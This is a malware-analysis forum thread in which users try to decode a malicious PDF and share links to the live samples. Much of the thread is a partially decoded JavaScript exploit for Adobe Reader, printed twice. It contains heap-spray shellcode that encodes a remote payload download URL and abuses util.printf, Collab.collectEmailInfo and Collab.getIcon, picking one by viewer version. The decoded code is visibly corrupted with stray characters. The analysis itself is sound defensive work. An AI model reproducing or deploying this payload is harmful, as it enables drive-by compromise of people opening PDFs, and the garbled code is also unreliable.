Author Topic: PDF Failed to decode  (Read 9789 times)


December 19, 2009, 09:03:11 am

Garlando

I tried with PDFTK and PDF-PARSER.PY, and both fail. I get this from PDF-PARSER:

'ASCIIHexDecode decompress failed'



December 19, 2009, 09:21:39 am
Reply #1

SysAdMini

Please don't attach malware unprotected !!!! Please use a password protected zip file next time.


I came across this sample too today. It can be found at
Code: [Select]
kijojg.net/fr/files/leerydumbbunny.pdf
I'm not aware of any tool that is able to decode the stream.

A second sample is here
Code: [Select]
kijojg.net/fr/files/scamtodosomething.pdf
password : infected
Ruining the bad guy's day

December 19, 2009, 09:33:43 am
Reply #2

parody

/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

But if you edit the PDF and remove /RunLengthDecode from the filter list, you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

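So if you look through the mess that gets output, we can see Collab.getIcon and Collab.collectEmailInfo being abused as usual, along with util.printf; the last function in the dump reads app.viewerVersion to decide which of the three to call. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip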



ps. first time really coding in python which is prolly why my code is crap :D

December 22, 2009, 04:47:50 pm
Reply #3

origami

I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami

http://security-labs.org/origami - PDF parsing|forging tool

December 22, 2009, 04:52:34 pm
Reply #4

SysAdMini

I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami



Files are attached in the 2nd message of this topic. Direct link to attachment is:

http://www.malwaredomainlist.com/forums/index.php?action=dlattach;topic=3626.0;attach=539
Ruining the bad guy's day

December 22, 2009, 06:50:07 pm
Reply #5

origami

oups, thank u :)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/leerydumbbunny.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/leerydumbbunny.pdf :
--------------------------------------------------------------------------------
../../parser/stream.rb:299:in `decodedata': Error while decoding stream 4 0 R (Origami::InvalidStream)
   -> [Origami::Filter::InvalidLZWData] LZW table is full and no clear flag was set

Good, a bug to fix ;)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/scamtodosomething.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/scamtodosomething.pdf :
--------------------------------------------------------------------------------
eval(unescape("%76%61%72%20%6D%65%6D%6F%72%79...)

Better, no bug to fix :-D
http://security-labs.org/origami - PDF parsing|forging tool

January 06, 2010, 09:33:26 am
Reply #6

malware

/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip



ps. first time really coding in python which is prolly why my code is crap :D


I used the same samples provided, so how come I cannot get the same result? I have installed Python and removed the /RunLengthDecode filter.

Usage: pdf-parser.py [option] {sample file}

Is this correct?

January 06, 2010, 01:09:49 pm
Reply #7

parody

I still had to add a decoder for the LZWDecode filter; a basic one is included in the version of pdf-parser I listed in my other post.